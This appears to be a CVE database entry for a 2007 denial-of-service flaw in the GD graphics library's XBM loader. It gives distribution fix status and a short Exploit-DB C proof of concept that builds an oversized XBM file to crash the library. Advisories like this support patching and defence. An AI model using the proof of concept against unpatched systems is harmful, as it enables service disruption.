CVE-2007-3473
Description
The gdImageCreateXbm function in the GD Graphics Library (libgd) before 2.0.35 allows user-assisted remote attackers to cause a denial of service (crash) via unspecified vectors involving a gdImageCreate failure.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.
✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
GD Graphics Library 2.0.34 - 'libgd' gdImageCreateXbm Function Unspecified Denial of Service
// source: https://www.securityfocus.com/bid/24651/info
The GD graphics library is prone to multiple vulnerabilities.
An attacker can exploit this issue to cause denial-of-service conditions or execute arbitrary code in the context of applications implementing the affected library.
Version prior to GD graphics library 2.0.35 are reported vulnerable.
#include "gd.h"
int main() {
FILE *fp = fopen("./x.xbm", "w+");
fprintf(fp, "#define width 255\n#define height 1073741824\nstatic unsigned char bla = {\n");
fseek(fp, 0, SEEK_SET);
gdImageCreateFromXbm(fp);
}OS impact
Arch Fixed 1 release
| Version | Status | Fixed in |
|---|---|---|
| — | Fixed | 0.2.8.4-14 |
Debian Fixed 5 releases
| Version | Status | Fixed in |
|---|---|---|
| trixie | Fixed | 2.0.35.dfsg-1 |
| sid | Fixed | 2.0.35.dfsg-1 |
| forky | Fixed | 2.0.35.dfsg-1 |
| bullseye | Fixed | 2.0.35.dfsg-1 |
| bookworm | Fixed | 2.0.35.dfsg-1 |
References
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.